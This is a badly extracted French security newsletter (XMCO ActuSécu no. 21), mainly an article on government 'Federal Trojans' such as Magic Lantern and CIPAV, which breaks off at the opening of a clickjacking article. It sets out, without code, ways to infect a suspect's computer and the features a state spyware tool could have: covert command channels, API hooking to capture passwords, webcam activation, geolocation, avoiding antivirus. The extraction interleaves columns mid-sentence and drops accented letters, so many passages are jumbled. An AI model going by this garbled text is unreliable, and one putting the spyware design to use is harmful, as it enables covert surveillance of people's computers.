XMCO ActuSecu 21 FederalTrojan

LACTUSCU 21 XMCO | PARTNERS
FEDERAL TROJAN ET CLICKJACKING
SO MM AIR E
L es Fed e ra l Troja n : le s co ute s e t le s p e rq u is itio n s n u m r iq ue s
L e C lickJ a c k ing : une a t t a qu e a u s s i s im p le q u e ff ic a c e
L e S urfja c k ing : l e xpl o i t a t io n d e s c o o k ie s n o n s c u r is s
L act ualit du m ois : l e s fa ke AV, le s e x p lo its A c tiv e X , la f a ille B GP...
L es blogs s c ur it du m oi s : l a v is e t la v ie d e s e x p e r ts s c u r it
Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est

strictement interdite. [1]
LACTU SCU N21
Vo u s t e s c o n c e r n p a r l a s c u r i t i n f o r m a t i q u e d e v o t r e e n t r e p r i s e ?
Xmco Partners est un cabinet de conseil dont le mtier est l'audit en scurit informatique.
Tests d'intrusion
Mise l'preuve de vos rseaux, systmes et applications web par nos experts en intrusion
OWASP, OSSTMM, CCWAPSS
Audit de scurit
Audit technique et organisationnel de la scurit de votre Systme d'Information
Best Practices ISO 27001, PCI DSS, Sarbanes-Oxley
Veille en vulnrabilits
Suivi personnalis des vulnrabilits et des correctifs affectant votre Systme d'Information
Rponse intrusion
Dtection et diagnostic d'intrusion, collecte des preuves, tude des logs, autopsie de malware
propos du cabinet Xmco Partners
Fond en 2002 par des experts en scurit, dirig par ses fondateurs, nous n'intervenons que sous forme de projets
forfaitaires avec engagement de rsultats.
Les tests d'intrusion, les audits de scurit, la veille en vulnrabilit constituent les axes majeurs de dveloppement
de notre cabinet.
Paralllement, nous intervenons auprs de Directions Gnrales dans le cadre de missions daccompagnement de
RSSI, dlaboration de schma directeur ou encore de sminaires de sensibilisation auprs de plusieurs grands
comptes franais.
Pour contacter le cabinet Xmco Partners et dcouvrir nos prestations : http://www.xmcopartners.com/

WWW.XMCOPARTNERS.COM

LEDITO
Lhyperactivit de la scurit informatique...
N U M R O2 1
Notre secteur d'activit souffre d'activit, en passant par la scurit temps de crise (dont tout le monde
d'hyperactivit depuis son origine : du dveloppement. Finalement, il parle, et dont nous ne parlerons
tous ses acteurs passent d'un sujet devient de plus en plus courant de pas !), que va-t-il advenir des
un autre, avec une quasi- constater qu'en crant des postes budgets scurit ? Vont-ils tre
frnsie, sans jamais aller au bout de RSSI, chaque personne de maintenus ? Diminus ?
des choses, ni jamais rgler l'entreprise s'est dessaisie de la Augments ?
totalement les problmes, au motif scurit puisqu'un Sauveur venait Aprs l'affaire Kerviel et les
qu'il y a trop de sujets couvrir... point nomm l'en dbarrasser. multiples constats de dfaillances
informatiques, a serait un comble
En dfinitive, on peut se poser la de se retrouver en plus sans
question lgitime suivante : moyen...
adresser des problmatiques
complexes qui ncessitent des En attendant de dcouvrir peu
notions aussi bien d'expertises que peu les rponses aux questions qui
de diplomatie et de ngociation ne se profilent, voici de nouvelles
doit-il relever que du RSSI...? tudes concernant les attaques
Si l'on regarde bien chaque mtier Web du moment, un petit mot sur
de l'informatique, tout le monde notre participation au prochain
jouit d'un descriptif de poste prcis, Infosecurity, un descriptif des
avec des objectifs dtaills chevaux de Troie utiliss par les
atteindre, et des moyens plus ou Au final, au lieu de fdrer les gouvernements et lactualit du
moins en adquation. nergies, le RSSI se retrouve mois.
devoir tout couvrir en mme temps,
Qu'en est-il du RSSI, auquel on parfois la place des autres. En esprant avoir vos avis trs
demande de couvrir aussi bien la Forcment, a puise... bientt, je vous souhaite une bonne
scurit des postes nomades, que juste titre, il est lgitime de poser lecture.
la gestion du Plan de reprise une question d'actualit : en ces Marc Behar
Les Federal Trojans......................................4 LActualit scurit du mois......................25

Prsentation des ventuels chevaux de Troie utiliss par Analyse des vulnrabilits et des tendance du moment.
certains gouvernements.
Le ClickJacking..........................................14 InfoSecurity.................................................32
Analyse dune nouvelle attaque Web, simple mais efficace. Le Salon InfoSecurity et la confrence XMCO
Le SurfJacking............................................19
Les Blogs scurit.......................... ...........33
Prsentation dune autre attaque web exploitant les cookies
Robert Hansen, Cdric Blancher et Bily Rios
non scuriss.

LACTU SCU N21
Les Federal Trojan : les coutes et

les perquisitions numriques
Lors de la grande messe

BlackHat qui s'est tenue Las
Vegas cet t, un vieux sujet a
refait surface : les Chevaux de
Troie gouvernementaux.
Derrire ce concept se cache un

enjeu crucial pour les forces
de l'ordre : les perquisitions
numriques, le renseignement,
les infiltrations et les
coutes de la tlphonie sur
Internet l'heure du web 2.0.
FEDERAL TROJAN XMCO | Partners
Lhistorique Lorsque l'on parle de Backdoor ou de Trojan, on parle

Back in 1970 aussi gnralement de "rootkit". Le terme "rootkit"
dfinit l'ensemble des techniques et des astuces du
Avant de commencer, un claircissement lexical systme d'exploitation permettant de cacher la
s'impose. prsence d'une Backdoor l'utilisateur victime. Les
Les termes Trojan, Cheval de Troie, Backdoor ou techniques de rootkit permettent de cacher les traces
encore porte drobe dsignent un logiciel ayant pour gnres lors de l'installation et de l'utilisation de la
vocation de donner un accs logique un ordinateur Backdoor sur le systme. La technique la plus simple
sans l'autorisation de son propritaire. Ces logiciels consiste, sur un systme Unix, modifier le code des
sont le plus souvent envoys la victime dans une utilitaires "ps" et "netstat" pour ne pas afficher qu'ils
pice jointe, un email ou ajouts discrtement un affichent le processus malicieux et les connexions
autre logiciel. rseau engendres par la Backdoor.
Ces logiciels malicieux ont t mdiatiss la fin des
annes 90 avec la clbre Backdoor BackOrifice
diffuse par le groupe de hackers nomm "Cult Of the
Dead Cow". Cette Backdoor, prsente sous la forme

d'un logiciel d'administration de parc informatique,
permettait aux pirates de prendre le contrle distance
d'un ordinateur Windows via le port TCP 31337,
numro faisant rfrence au mot "ELEET" dans le
langage haxor.
Backorifice n'est pour pas autant la premire Backdoor.
Ce concept est aussi vieux que l'informatique :
l'poque des premiers systmes ouverts, les
dveloppeurs avaient l'habitude de s'amnager un
compte Telnet cach sur les systmes de leurs clients
afin de pouvoir revenir corriger simplement les
ventuels bugs de leurs programmes.

LACTU SCU N21
2000 : apparitions des Trojans fdraux Des chevaux de Troie spcialement conus...
Pourquoi les Trojans Fdraux?
Les pirates se sont toujours intresss aux Backdoors,
car celles-ci constituent toujours une tape cl lors Le besoin pressant de tels logiciels est apparu suite aux
d'une intrusion informatique. Les autorits diffrents cas o des terroristes avaient utilis des
gouvernementales ont galement commenc webmails et des forums Internet pour prparer leurs
s'intresser l'utilisation lgale des Backdoors la fin actes. Les services de renseignements de plusieurs
des annes 90. En 2001, le gouvernement amricain a pays se sont alors intresss la possibilit d'installer
d'ailleurs rvl avoir dvelopp une Backdoor des un logiciel espion au sein d'ordinateurs personnels et
fins d'enqute pour le FBI. Cette dernire, nomme de pouvoir ainsi dtecter au plus tt des actions
"Magic Lantern", devait tre utilise pour s'introduire terroristes.
dans les ordinateurs des fins de renseignement. En effet, le renseignement technique bas sur les
coutes tlphoniques touche ses limites lorsque les
terroristes utilisent des forums Internet et des webmails
pour prparer leurs actes.
Si l'on devait tablir une liste des besoins des

enquteurs ncessitant l'installation distance d'un
logiciel espion sur la machine d'un suspect, nous
proposerions :
-Surveillance de l'utilisation des forums
-Rcupration des mots de passe pour pouvoir
s'introduire dans les serveurs privs utiliss par le
suspect
-Rcupration de preuves sur l'ordinateur avant la
perquisition et avant la destruction volontaire du disque
dur
-Surveillance des emails et des chats
-Djouer le chiffrement
-Contourner les freins et les ralentissements lis aux
La Magic Lantern a ouvert la voie pour l'utilisation des
perquisitions chez les hbergeurs et les FAI
fins judiciaires de logiciels utilisant le principe des
-Lister les destinataires (emails, IP) de complices...
Backdoors. La Magic Lantern est ce que l'on appelle un
Federal Trojan (Trojan fdral ou "Cheval de Troie
Le dernier point est trs important. Aujourd'hui, les
gouvernemental" en franais). Le terme "policeware"
coutes et les perquisitions sont ralises chez le FAI
est galement utilis en rfrence aux "malwares".
du suspect. Mais avec l'explosion des Hotspots WiFi et
des accs nomades, il devient forcment trs difficile
D'aprs les informations qui ont circul l'poque, la
pour la police d'intervenir chez le FAI d'un suspect. De
Magic Lantern prenait la forme d'un programme
plus, avec le peu de logs exploitables disponibles chez
excutable envoye par email par le FBI. Une fois
certains FAI et lorsque le temps est compt, il devient
excut, celle-ci avait pour vocation de se cacher et
plus pratique de s'introduire directement dans
d'enregistrer les frappes de clavier avec un keylogger.
l'ordinateur du suspect pour y rcuprer directement les
La rvlation de l'existence de ce Federal Trojan par les
preuves et les renseignements ncessaires l'enqute.
services secrets amricains - suite une fuite relaye
par plusieurs journalistes amricains - avait d'ailleurs
engendr un dbat trs intressant sur le rle
patriotique des diteurs antivirus. Ces derniers doivent-
ils dtecter la Magic Lantern ?
l'poque, Symantec, l'diteur de Norton Antivirus,

avait annonc qu'ils pourraient prendre des dispositions
pour ne pas dtecter ce logiciel espion. A contrario,
Sophos dclarait qu'ils dtecteraient la Magic Lantern
car leur antivirus n'tait pas destin uniquement au
march amricain et que les citoyens de pays trangers
avaient le droit de savoir s'ils taient "sur coute".
Depuis la Magic Lantern, le FBI a continu de

dvelopper le concept de Federal Trojan, notamment
avec le logiciel CIPAV qui s'est rendu clbre lors de
l'affaire Timberlinebombinfo (voir encadr sur le sujet).

LACTU SCU N21
Lide traverse lAtlantique : BundesTrojaner le canal est chiffr (SSL, SRTP...). La seule solution
efficace et pratique pour une telle coute consiste
Les besoins d'intrusion au sein de l'ordinateur d'un s'introduire dans un des deux ordinateurs
suspect ne sont pas exclusifs aux affaires amricaines. communicants et d'couter - la source - la
Le sujet des Trojans fdraux a travers l'Atlantique. conversation avant son chiffrement.
Cette pratique a t trs discute en Allemagne en Il est bien sr possible d'imaginer des attaques
2007 avec le projet de loi de l'ancien ministre de cryptographiques ou SSL-Man-in-the-middle, mais ces
l'Intrieur allemand Heinz Fromm concernant la techniques d'attaques ne sont pas assez fiables pour
cration d'une possibilit juridique pour fouiller, une utilisation des fins de renseignement. Si le canal
distance, l'ordinateur d'un suspect. Il tait alors fait de communication n'est plus en mesure d'tre cout,
rfrence au terme "BundesTrojaner", le Cheval de l'information doit tre rcupre la source... Une
Troie Fdral. Les organes d'tat allemand ont socit allemande propose justement un tel outil...
l'poque rejet un tel projet, expliquant qu'il tait interdit
de fouiller l'ordinateur d'un suspect sans son
autorisation. Cependant, le projet de BundesTrojaner
n'a - certainement - pas t abandonn, car l'utilisation
d'un BundesTrojaner est lgalement utilisable lorsque la
protection de la Constitution ou la scurit nationale est
INFO
en jeu. La Skype Capture Unit
Les gouvernements sudois et autrichien ont En Allemagne, la socit Digitask

galement annonc qu'ils rflchissaient un cadre spcialise dans la scurit des
juridique pour des Trojans Fdraux. tlcommunications propose l'tat
allemand d'utiliser un Trojan pour
couter les conversations Skype SSL.
Cette offre fait suite au dsir de

l'tat d'tablir un protocole d'coute
pour les communications tlphoniques
mises depuis le territoire allemand
avec le logiciel d'eBay. Digitask
propose de facturer l'tat les coutes
la communication. Le prix de 2500
euros par conversion SSL capture a t
rvl par un devis scann et largement
diffus sur le net.
La fin des coutes classiques

L'agent 007 n'aura donc plus besoin de cacher un
Avant tout, le Trojan Fdral rpond une interrogation mouchard dans le combin de l'espion russe et Q va
lgitime des services de renseignements: comment devoir se mettre l'informatique ;)
continuer surveiller les conversations tlphoniques
l'heure de Skype ? Les coutes classiques sur la paire
torsade d'une ligne tlphonique sont, en effet,
devenues obsoltes avec la tlphonie sur IP et encore
plus avec l'utilisation du chiffrement SSL.
Bien que l'tat chinois ait rsolu le problme de Skype

et de SSL en diffusant une version bugge du logiciel
d e t l p h o n i e s u r In te r n e t, l e s s e r v i c e s d e
renseignements de tous les pays doivent lgitimement
trouver des moyens techniques fiables pour couter
une communication tlphonique mise depuis un
ordinateur suspect et cela indpendamment de l'endroit
o est branch cet ordinateur.
En particulier - et mme si le mythe des cls de

chiffrement 128 bits casses en quelques secondes
par la NSA persiste - l'coute sur Internet d'un flux de
voix sur IP (H.323 ou RTP) devient difficile ds lors que

LACTU SCU N21
Les services de renseignements tatiques ne M.Grunwald nous fait d'ailleurs remarquer les millions
s'intressent pas seulement aux conversations de tlchargements de la mise jour 3.0 de Firefox le
tlphoniques : l'interception des emails devient jour de sa sortie.
galement incontournable. Bien que la capture d'une
messagerie sur un FAI classique soit assez simple Cette mthode ncessite la coopration du FAI du
mettre en oeuvre, l'opration devient trs difficile suspect. La connaissance de l'adresse IP du suspect
lorsqu'il s'agit d'une webmail hberge l'tranger ou est indispensable pour cibler l'infection ; le cas chant,
de forums de discussion privs. Dans ces situations,les des millions d'utilisateurs pourraient tre injustement
enquteurs n'auront trs certainement pas la possibilit infects par le Trojan Fdral. Mr Grunwald expose
de perquisitionner rapidement l'hbergeur. d'ailleurs cette mthode pour infecter simplement des
millions de citoyens.
Un logiciel espion install sur l'ordinateur du suspect
permettra de lire les messages posts et reus, 3) L'intrusion physique. Les services de
indpendamment du systme de messagerie utilis. renseignements s'introduisent dans la rsidence du
suspect et installent discrtement le Trojan dans son
ordinateur. Avec cette mthode, il est mme possible
Modus Operandi d'utiliser un Trojan matriel insr physiquement dans
l'ordinateur ou le modem ADSL. Cette mthode pourrait
Nous comprenons donc bien pourquoi les services de avoir un certain succs juridique, car elle permet
renseignements et les gouvernements s'intressent d'assurer l'identit du suspect et ainsi rpondre un
forcment au concept de Trojan fdral. Mais comment grand nombre de limitations d'ordre juridiques et
pourraient-ils procder pour introduire en premier lieu constitutionnels.
ce logiciel espion?
4) Le tlchargement obligatoire. Combien de
Lors de la confrence Blackhat ddie ce sujet, personnes dclarent leurs impts par Internet ?
M.Grunwald a numr plusieurs moyens que nous Lorsque vous tlchargez l'applet Java signe du
citons et compltons ici avec nos propres hypothses. Ministre des Finances, le serveur des impts pourrait -
techniquement - insrer silencieusement un Trojan
dans votre ordinateur.
1) La mthode "rentre dedans" : un fichier excutable

attach un email judicieusement rdig incitant le
suspect ouvrir le programme.
2) L'insertion du Trojan dans un tlchargement

initi par le suspect. C'est la technique illustre par
Grunwald lors de sa prsentation la Blackhat. Il
suffirait un gouvernement de s'associer avec les
fournisseurs d'accs Internet ou avec les sites de
tlchargement. En positionnant un serveur proxy
transparent entre le suspect et un serveur web de
tlchargement, il est facile d'ajouter - la vole - le
Trojan Fdral tous les programmes tlchargs par
les suspects. La plupart des logiciels se mettent jour
tout seuls par Internet (ex: Windows Update, iTunes,
Office, etc.). Cette mthode est donc trs efficace.

LACTU SCU N21
5 ) L'exploitation d'une faille de scurit. Il s'agit ici tude prospective sur les fonctionnalits
d'exploiter une vulnrabilit de l'ordinateur suspect pour
le forcer tlcharger et excuter le programme du Si nous devions concevoir et utiliser un Trojan fdral,
Federal Trojan. Pour cela, il serait possible d'exploiter quelles en seraient les fonctionnalits? Nous
des failles de scurit du navigateur Internet (ex: prsentons ici ces fonctionnalits hypothtiques en
Internet Explorer), du client de messagerie (ex : plusieurs catgories.
Outlook) ou encore des plug-ins de navigation trs
populaires comme Adobe PDF ou Macromedia Flash. Le canal de contrle
C'est ici la mme mthode qui est employe par les
pirates informatiques avec des packs d'exploits comme To u t d ' a b o r d , l e
MPack ou NeoSploit. Cette mthode, bien que trs Trojan fdral doit
efficace, requiert le maintien d'une librairie d'exploits et p o u v o i r
de 0-day performants par les autorits. communiquer avec
son serveur matre
6 ) Les ActiveX et les applets signes. Il s'agit ici pour pouvoir envoyer
d'utiliser une applet qui se chargera de sortir de la les informations
sandbox du navigateur et d'installer le Trojan fdral. Il captures.
est videmment difficile pour un pirate de faire certifier Il est vident
son Trojan malicieux par une autorit de confiance, aujourd'hui que le
mais cela est tout fait envisageable pour un Trojan tablira une
gouvernement. Une applet signe ou un ActiveX connexion sortante
Microsoft certifi ne demandent pas la permission de type phone-home,
l'utilisateur pour outrepasser les restrictions du trs certainement au
navigateur et accder aux couches basses du systme dessus du
d'exploitation. protocole HTTPS.
Idalement, le Trojan
Cette dernire mthode a pour avantage d'tre portable devra tre capable
et relativement universelle... d'utiliser plusieurs mthodes de connexion avec son
matre afin de parer aux blocages qu'il pourra
rencontrer sur l'ordinateur du suspect : firewall
personnel, proxy, filtre...
Pourquoi ne pas imaginer un Trojan utilisant des
techniques dites de "canaux cachs", avec, par
exemple des flux encapsuls dans du POP3/IMAP ou
des requtes DNS ?
La collecte de renseignements
Il s'agit ici de la fonctionnalit de base d'un Trojan

fdral : rcuprer des preuves distance. Les Anglo-
saxons appellent cela le "remote forensics".
Bien que sduisante, l'ventualit d'une copie ISO,
distance, du disque dur risque d'tre carte pour des
problmes vidents de bande passante. Le Trojan sera
charg de chercher des documents dans le disque dur
du suspect selon plusieurs mots-cls : en bref,
l'quivalent d'un Google Desktop ou d'un Apple

Spotlight.
Le Trojan devra galement tre capable de rechercher

des informations dans l'historique d'Internet
Explorer et dans la base de registre : URL visites,
cookies, licences logicielles, numro de srie, mots de
passe, etc. Alors que la Magic Lantern possdait un
keylogger classique, il est probable qu'un tel Trojan
s'inspirera des malwares les plus rcents et utilisera la
technique de hooking de l'API Windows. Ds lors,
tout ce que le suspect postera sur Internet, y compris
sur des sites HTTPS, sera enregistr. Tous les champs
HTML INPUT seront copis : mots de passe sur des
LACTU SCU N21
forums, contenus des formulaires, etc. Le malware La crainte du Trojan de srie
Anserin a prouv la puissance de cette technique (Voir Le cas Sony Music
l'article de Yannick Hamon et de Frdric Charpentier
prsent lors de la confrence SSTIC 2008). Lorsque l'on aborde le thme des Trojans fdraux, il
est impossible de ne pas craindre la prsence d'un
Enfin, les connaisseurs des Backdoors BackOrifice Trojan de srie. En 2005, Sony a dfray la chronique
ou SubSeven aimeront la possibilit d'activer le micro avec son "DRM Trojan horse". Ce Trojan, dcouvert
et la webcam de l'ordinateur (intgrs tous les par hasard par la socit Sysinternals, s'installait
ordinateurs portables rcents). silencieusement la lecture dans un ordinateur
Windows d'un CD press par Sony Music.
Lidentification et la localisation du suspect
Les preuves sont inutiles si la police ne peut pas Un Federal Trojan doit tre capable de
localiser prcisment le suspect ("loger" dans le jargon golocaliser lordinateur infect par plusieurs
policier). Comment un Trojan pourrait-il golocaliser mthodes : adresse IP source, triangulation,
l'ordinateur ?
recherche dans lhistorique de navigation...
Tout d'abord, le Trojan pourra dterminer l'adresse IP
LAN et publique du suspect. Cela peut tre trs utile si
le suspect utilise un rebond ou le rseau Ce Trojan installait alors une Backdoor IRC sur tous les
d'anonymisation TOR. partir de l'adresse IP relle du ordinateurs lisant le CD. Mis part le fait de combattre
suspect et avec la collaboration du FAI de ce dernier, il le piratage, les objectifs rels de ce Trojan n'ont jamais
sera possible d'obtenir l'adresse postale de la t dtermins. Pour l'anecdote, quelques semaines
personne. Le FBI possde d'ailleurs un Trojan ddi aprs la dcouverte du Trojan Sony, un malware
la rvlation de l'IP relle d'un suspect (voir cas nomm Stinx, diffus sur la toile, tentait dj d'exploiter
l'encadr Timberlinebombinfo). une faille de scurit du Trojan Sony.
Envoyer ou Ne pas envoyer
Qui ne sait jamais demand, lors du Enime plantage

de Word, ce qui tait rellement envoy Microsoft
lorsqu'une fentre de dialogue s'affiche pour vous
demander si vous voulez envoyer (ou non) les
informations sur le crash Microsoft ? normment de
logiciels commerciaux sont aujourd'hui quips d'un
phone-home (voir ActuScu n12). Il est intressant de
se demander ce qu'envoient tous nos logiciels sur
Internet sans notre autorisation.
Si l'IP source n'est pas suffisant, ce qui risque d'tre le

cas dans certaines situations (hotspots, FAI tranger,
Roaming...), le Trojan pourra tenter de triangulariser le
suspect avec plusieurs requtes traceroute. Cela ne
donnera pas l'adresse exacte, mais pourra donner des
indications sur la rgion au niveau mondial.
Enfin, la localisation d'un suspect peut tre assez

simple : il suffit parfois de fouiller la base de registre et
l'historique de navigation Internet la recherche de
noms, d'adresses, de numro de tlphone, de numro
de sri, etc. Le suspect a peut-tre command une
pizza par Internet en inscrivant sa vritable adresse ou
a achet son ordinateur en donnant sa vraie adresse
(les numros de srie du chssis/processeur seront
alors recherchs).
Il existe un grand nombre de traces dans un

ordinateur pour en dterminer son propritaire. Nous
ne les voquerons pas toutes ici.

LACTU SCU N21
Un Trojan dans les processeurs Portabilit et convergence
Le meilleur Trojan de srie serait videmment un code Concrtement, si les gouvernements investissent dans
insr directement dans le micro-processeur par le le dveloppement d'un vritable Trojan des fins
fondeur (AMD, Intel, Motorola...). Ds lors, il serait policires, il est probable que ce logiciel fonctionnera
extrmement difficile de dtecter ces programmes- avant tout sur les systmes Windows. Avec
espions, car ces derniers ne seraient pas dans le l'engouement pour le systme Mac OS X, il est aussi
systme d'exploitation. probable qu'il devra galement s'infiltrer dans la
pomme.
Plusieurs sujets connexes ont t prsents la Dans le cas o la cible utilise Windows avec les droits
confrence SSTIC en juin dernier. Il est vident que ce Administrateurs, l'injection d'un Trojan ne sera pas
risque doit tre pris au srieux par les agences de difficile. Mais si la cible est un systme Mac OS X ou
contre-espionnage. Linux, l'utilisateur devra autoriser le Trojan s'installer.
Un Trojan multiplateforme Java ?
Est-il possible de construire un Trojan suffisamment

performant en Java ? Chaque systme possdant ces
spcificits (base de registre, /Library, permissions sur
les fichiers, etc.) une version spcifique chaque OS
sera certainement envisage. Il sera donc ncessaire
pour un gouvernement de maintenir plusieurs Trojans.
Les smartphones
Bien que les coutes tlphoniques GSM soient

ralises au niveau de l'oprateur ou des relais radios
(BSS, BSC,...), l'arrive des Smartphones avec un
vritable systme d'exploitation ouvre de nouvelles
possibilits. Puisque l'oprateur peut pousser
automatiquement des mises jour sur les tlphones,
pourquoi ne pas en profiter pour ajouter un Trojan au
besoin ? Il sera par exemple possible de surveiller les
emails rdigs par le suspect avec son Smartphone.
Certains rtorqueront que cela n'est mme pas
ncessaire s'il s'agit d'un Blackberry...
quand le premier Trojan (fdral ou non) pour

iPhone ? Avec le GPS intgr dans le tlphone, la
golocalisation sera un jeu d'enfant.

LACTU SCU N21
LAFFAIRE TIMBERLINEBOMBINFO
Le 4 juin 2007, le lyce Timberline (Idaho, USA)
reoit plusieurs menaces terroristes par email. Cet
email, provenant de la webmail Google avec l'adresse
dougbrigs@gmail.com, menace de faire exploser une
bombe dans le lyce. L'auteur, sr de son anonymat,
ajoute mme Oh, and for the police officers and
technology idiots at the district office trying to
track this e.mail... I can give you a hint. The email
was sent over a newly made gmail account, from
overseas in a foreign country. ... So, good luck
talking with Italy about getting the identity of the
person who owns the 100Mbit dedicated server
Dans un second email pour semer la terreur dans le

lyce, l'auteur ajoute : HAHAHA... its coming from
Italy. Oh, and this e.mail will be sent behind a
proxy behind the Italy server .
A la demande du FBI, Google fournit les logs

enregistres lors de la cration du compte
dougbrigs@gmail.com. Ces logs rvlent que l'adresse
IP utilise est l'adresse de la machine zombie en Italie. Ds lors, l'enqute devient
difficile...
Un lve dclare alors avoir reu des messages sur MySpace en provenance d'un profil
nomm Timberlinebominfo.
L'enqute redmarre alors. MySpace est somm de donner les logs de cration du profil
Timberlinebominfo. L encore, la dception est au rendez-vous : l'adresse IP est
l'adresse italienne.
L'auteur des menaces terroristes semble effectivement avoir pris ses prcautions.
Le FBI dcide alors d'utiliser un Federal Trojan nomm "CIPAV" (Computer and Internet
Protocol Address Verifier). L'objectif de ce Trojan est de rvler l'adresse IP relle
de la personne l'excutant, peu importe le nombre de rebond et de proxies utiliss.
CIPAV est alors implant sur le MySpace du pirate avec la collaboration de MySpace.
C'est ainsi que l'auteur des emails terroristes s'est fait piger : en visitant son
profil, le CIPAV s'est silencieusement install sur l'ordinateur du terroriste et a
immdiatement envoy l'adresse IP au FBI. A priori, le CIPAV aurait t inject via une
faille de scurit, alors non patche, d'Internet Explorer : la faille ANI.
Le rapport complet de Norman

Sanders, l'agent du FBI
charg de l'enqute, a t
rendu public et est
tlchargeable l'adresse
suivante :
http://blog.wired.com/
27bstroke6/files/
timberline_affidavit.pdf

LACTU SCU N21
Les limites des Trojans fdraux Enfin, comment s'assurer que ces Trojans soient
uniquement utiliss pour couter des cellules
Tout d'abord, la collaboration des diteurs antivirus terroristes ? Pourraient-ils tre utiliss des fins
n'est pas une condition indispensable, mais elle serait politiques en coutant des opposants, des journalistes
trs pratique. L'affaire de la Magic Lantern avait ou encore des syndicalistes ?
dmontr la collaboration de plusieurs diteurs avec le
gouvernement amricain : ceux-ci ne dtectaient pas,
volontairement, le logiciel espion Magic Lantern. Le risque de contre-attaque
Ensuite, ces Trojans ont pour objectif de faire ce que Un risque important pour le Trojan fdral rside dans
les Anglo-saxons appellent du "remote forensics" : de la le piratage du Trojan lui-mme. Il n'est pas rare de voir
rcupration de preuves distance. Une limite pourrait un malware s'attaquer un autre malware, comme le
trs bien tre la diffusion de fausses preuves ou la cas du Trojan Sony DRM.
dsinformation cible. Si le suspect est conscient d'tre
vrol, celui-ci peut volontairement laisser en vidence Que se passe-t-il si des pirates dcouvrent une
de fausses informations sur son bureau ou indiquer de vulnrabilit au sein mme du Trojan ? Ces derniers
fausses pistes par chat. pourraient prendre le contrle de l'ordinateur des
citoyens suspects. Pire, ils pourraient utiliser la mme
signature que celle du Trojan fdral - soit une
signature potentiellement non dtecte par les antivirus
- pour diffuser leur propre malware.
Enfin, le Trojan doit forcement communiquer avec un

serveur maitre, son C&C. Si ce dernier tait repr, des
pirates pourraient contre-attaquer ce serveur.
Les gouvernements devront alors mettre en place des
protections pour ne pas tre facilement identifiables,
par exemple un rseau de type fast-flux (Voir ActuScu
n18).
Et la France dans tout a?

Un fdral Trojan hexagonal?
Nous en arrivons la question sous-jacente de cet

L'une des principales limites techniques rside dans la article. Est-ce que le gouvernement pourrait utiliser,
difficult d'identifier et de cibler - coup sr - le dans un futur proche, un fdral Trojan la franaise ?
suspect. Avec les proxies, le NAT, les hotspots, Nous n'avons aucune confirmation (dans un sens
l'utilisation de l'adresse IP source n'est pas comme dans l'autre) sur l'existence d'un tel logiciel.
suffisamment fiable pour identifier un suspect. Les Cependant, quelques informations mritent d'tre mises
risques de drapage, d'coute de la mauvaise en perspective.
personne et d'atteintes aux liberts individuelles
(donnes confidentielles, sant, ordinateur partag,
etc.) sont omniprsents.
Si l'ordinateur utilis par le suspect appartient une
entreprise trangre ? Le Trojan tatique pourrait tre
considr comme un acte d'espionnage industriel.
Restent ensuite toutes les difficults d'ordre lgal : en

fonction des pays, les preuves peuvent-elles tre
opposes un prvenu lorsqu'elles ont t rcupres
sans son autorisation ? L'utilisation d'un Trojan fdral
ne serait-elle pas un vritable risque pour l'enqute
dans la mesure o le prvenu pourrait retourner
juridiquement le Trojan contre le plaignant avec un vice
de procdure ? Il serait intressant d'en dbattre avec
des experts juridiques ; nous avons pris contact avec
diffrents experts sur le sujet, personne n'a souhait
nous rpondre.

LACTU SCU N21
Livre Blanc, CNIL, DCRI, EDVIGE, LOPSI... Dans un article du 25 juin 2008, le journal le Monde
explique que la police prvoit de raliser des
Tout d'abord, le rcent livre blanc sur la dfense "captations" informatiques par l'introduction dans les
nationale voque "le dveloppement d'outils spcialiss ordinateurs des citoyens d'un "cheval de Troie"
(armes numriques de rseaux, laboratoires technico- informatique avec l'aval d'un juge et sans l'autorisation
oprationnels)". Peut-on imaginer qu'un Trojan soit des intresss.
considr comme une arme numrique ?
Ensuite, la CNIL serait-elle consulte ? La commission Conclusion

pourrait-elle s'opposer pour des raisons de protections
de la vie prive la diffusion d'un Trojan tatique ? La Le renseignement de terrain a encore de beaux
LIO (Lutte Informatique Offensive) sera trs jours devant lui, mais il est indniable qu'il devient
certainement gagnante lorsqu'il s'agira de la scurit de indispensable pour les tats de se doter d'outils
l'tat. numriques pour la lutte informatique.
Il est trs probable que si un cadre juridique se forme La cration du service franais DCRI (Direction
autour du sujet des Trojans fdraux en France, il s'agit Centrale du Renseignement intrieur, le FBI
de la LOPSI. franais) et les diffrents projets de fusion des
fichiers de renseignements indiquent la tendance.
La LOPSI ou Loi d'Orientation et de Programmation
pour la Scurit intrieure, est apparue en 2002 sous la Il reste cependant de trs importantes contraintes
forme d'un projet de loi permettant aux officiers de techniques et lgales : comment cibler le suspect ?
police judiciaire, si un magistrat l'autorise, d'accder viter les drives ? Ne pas tre dtect par les
directement des fichiers informatiques et de saisir antivirus ? Construire des quipes d'experts
distance par la voie tlmatique ou informatique les (publics ou privs) qui maintiendront jour un outil
renseignements qui paratraient ncessaires la efficace ?
manifestation de la vrit (Source legifrance.gouv.fr).
Enfin, il est certain que les hackers - whitehat ou
Ce projet de loi est apparu aprs voir fait le constat blackhat - s'intresseront de trs prs ces outils
qu'un trop grand nombre d'enqutes judiciaires et chercheront les analyser en dtail.
pouvaient tre paralyses par l'incapacit des
institutions publiques ou prives (tablissements Beaucoup de points restent donc encore en
financiers, oprateurs de tlphonie, administrations...) suspens.
rpondre dans des dlais raisonnables aux
rquisitions effectues par les officiers de police
judiciaire la demande de l'autorit judiciaire. Le plus
souvent, la raison invoque par les personnes requises
pour justifier ce retard est la difficult d'extraire, de
traiter et de faire parvenir les renseignements
demands au service de police ou de gendarmerie
requrant.
Concrtement, la police va pouvoir saisir (et accder

distance) aux logs des FAI avec une autorisation
adquate.
Le dcret N2106-358 du 24 mars 2006, impose

dsormais aux FAI (Fournisseurs d'Accs l'Internet)

de conserver au minimum 1 an toutes les donnes de
connexion de ses abonns des fins d'identication lors
d'une ventuelle enqute de police. Ainsi, un abonn
ADSL avec une adresse IP flottante pourra tre identifi
en fonction de la date et de son IP au moment des faits
prsums.
En dcembre 2007, la loi LOPSI n2 fait grand bruit

avec le Figaro titrant (selon des sources proches du
gouvernement) : " Bientt des mouchards de police sur
les ordinateurs".

LACTU SCU N21
Le Clickjacking : une nouvelle attaque

web simple mais efficace
LE CLICKJACKING Quelques semaines

SurfJacking, une
aprs le
nouvelle
vulnrabilit cette fois-ci
t identifie au sein des
navigateurs Internet.
En effet, Jeremiah Grossman et

Robert Hansen ont dcouvert au
dbut du mois de septembre un
problme critique affectant
tous les navigateurs du march.
Cette attaque base sur une

utilisation malicieuse de
